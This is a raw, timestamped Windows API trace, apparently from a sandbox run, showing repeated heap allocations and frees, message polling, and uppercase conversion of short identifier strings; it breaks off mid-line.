[0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15b38) returned 0x37c0048 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0149.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0149.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0149.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.717] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0149.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0149.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.718] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.718] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0149.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.720] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0149.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f88 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.721] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0149.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.721] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2e8 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0149.722] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.722] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.722] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.722] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.723] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.724] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.724] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3d8 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0149.724] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 